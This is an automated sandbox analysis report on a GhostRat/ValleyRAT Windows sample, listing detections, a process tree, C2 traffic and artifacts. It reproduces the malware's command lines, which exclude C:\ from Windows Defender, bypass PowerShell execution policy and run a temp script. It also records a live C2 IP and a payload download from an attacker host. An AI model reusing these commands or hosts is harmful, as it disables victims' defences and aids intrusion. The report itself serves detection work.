Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FIWszl1A8l.exe

Overview

General Information

Sample name:FIWszl1A8l.exe
renamed because original name is a hash value
Original sample name:f1c0a349ef488c9d2fde3dd7f3c497bd.exe
Analysis ID:1587335
MD5:f1c0a349ef488c9d2fde3dd7f3c497bd
SHA1:20eb1d3d000be4d3c06c88a54eeb57fb01b054d5
SHA256:38e825894f85ed654a2badb58f28b334597d2662952d9a5ec6918bd8c8b7335a
Tags:exeValleyRATuser-abuse_ch
Infos:

Detection

GhostRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • FIWszl1A8l.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\FIWszl1A8l.exe" MD5: F1C0A349EF488C9D2FDE3DD7F3C497BD)
    • cmd.exe (PID: 7628 cmdline: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7680 cmdline: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • WmiPrvSE.exe (PID: 7792 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • FIWszl1A8l.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Roaming\FIWszl1A8l.exe" MD5: F1C0A349EF488C9D2FDE3DD7F3C497BD)
      • cmd.exe (PID: 2416 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7604 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 2452 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7648 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 7924 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7980 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 8076 cmdline: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8120 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

Threatname: GhostRat

{"C2 url": "8.217.85.20:9093"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
    00000006.00000003.2570644353.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
      00000006.00000003.3537866824.0000000004173000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
        00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
          00000006.00000003.1775024265.0000000004111000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
            Click to see the 9 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.FIWszl1A8l.exe.27e1004.2.raw.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
              6.2.FIWszl1A8l.exe.43105eb.6.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                6.3.FIWszl1A8l.exe.41b486b.4.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                  6.2.FIWszl1A8l.exe.28205bf.3.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                    6.2.FIWszl1A8l.exe.27e1004.2.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                      Click to see the 18 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\FIWszl1A8l.exe", ParentImage: C:\Users\user\Desktop\FIWszl1A8l.exe, ParentProcessId: 7528, ParentProcessName: FIWszl1A8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7628, ProcessName: cmd.exe
                      Sigma detected: Script Interpreter Execution From Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\FIWszl1A8l.exe", ParentImage: C:\Users\user\Desktop\FIWszl1A8l.exe, ParentProcessId: 7528, ParentProcessName: FIWszl1A8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ProcessId: 8076, ProcessName: cmd.exe
                      Sigma detected: Suspicious Script Execution From Temp Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8076, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ProcessId: 8120, ProcessName: powershell.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7628, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7680, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\FIWszl1A8l.exe", ParentImage: C:\Users\user\Desktop\FIWszl1A8l.exe, ParentProcessId: 7528, ParentProcessName: FIWszl1A8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7628, ProcessName: cmd.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7628, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7680, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-10T07:52:36.994962+010020528751A Network Trojan was detected192.168.2.9499318.217.85.209091TCP
                      2025-01-10T07:54:11.167711+010020528751A Network Trojan was detected192.168.2.9499848.217.85.209092TCP
                      2025-01-10T07:55:51.459265+010020528751A Network Trojan was detected192.168.2.9499868.217.85.209092TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 6.2.FIWszl1A8l.exe.28205bf.3.raw.unpackMalware Configuration Extractor: GhostRat {"C2 url": "8.217.85.20:9093"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeReversingLabs: Detection: 31%
                      Multi AV Scanner detection for submitted file
                      Source: FIWszl1A8l.exeVirustotal: Detection: 45%Perma Link
                      Source: FIWszl1A8l.exeReversingLabs: Detection: 31%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

                      Compliance

                      barindex
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeUnpacked PE file: 0.2.FIWszl1A8l.exe.400000.0.unpack
                      Source: FIWszl1A8l.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 47.79.66.76:443 -> 192.168.2.9:49751 version: TLS 1.2
                      Source: FIWszl1A8l.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: UpdaterSetup.exe.pdb source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbBQ source: powershell.exe, 0000000D.00000002.1442464615.0000000006FC5000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 0000000D.00000002.1442901248.0000000007013000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1416194201.0000000002A77000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb source: FIWszl1A8l.exe, FIWszl1A8l.exe, 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, FIWszl1A8l.exe, 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb,''GCTL source: FIWszl1A8l.exe, 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, FIWszl1A8l.exe, 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbl source: powershell.exe, 0000000D.00000002.1442901248.0000000007013000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: UpdaterSetup.exe.pdbP source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr
                      Source: Binary string: updater.exe.pdb source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr
                      Source: Binary string: updater.exe.pdbP source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: z:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: x:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: v:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: t:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: r:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: p:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: n:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: l:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: j:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: h:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: f:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: b:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: y:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: w:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: u:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: s:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: q:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: o:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: m:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: k:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: i:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: g:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: e:Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile opened: [:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D080F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,6_2_02D080F0

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.9:49931 -> 8.217.85.20:9091
                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.9:49984 -> 8.217.85.20:9092
                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.9:49986 -> 8.217.85.20:9092
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 8.217.85.20:9093
                      Connects to many ports of the same IP (likely port scanning)
                      Source: global trafficTCP traffic: 8.217.85.20 ports 18852,8853,9092,3,5,9091,8
                      Source: global trafficTCP traffic: 192.168.2.9:49715 -> 8.217.85.20:8853
                      Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_10002090 InternetOpenA,InternetOpenUrlA,fopen,HttpQueryInfoW,SendMessageW,InternetReadFile,fwrite,SendMessageW,fclose,InternetCloseHandle,InternetCloseHandle,GetParent,ShowWindow,WaitForSingleObject,CoInitializeEx,CoCreateInstance,Sleep,Sleep,exit,0_2_10002090
                      Source: global trafficHTTP traffic detected: GET /ChromeSetup.exe HTTP/1.1User-Agent: URLDownloaderHost: jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.comCache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://.css
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://.jpg
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: powershell.exe, 0000000D.00000002.1416194201.0000000002ACC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1448148275.00000000081F3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1679857950.00000000070AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: powershell.exe, 0000000D.00000002.1442684525.0000000006FF6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1448148275.00000000081F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: ChromeSetup.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
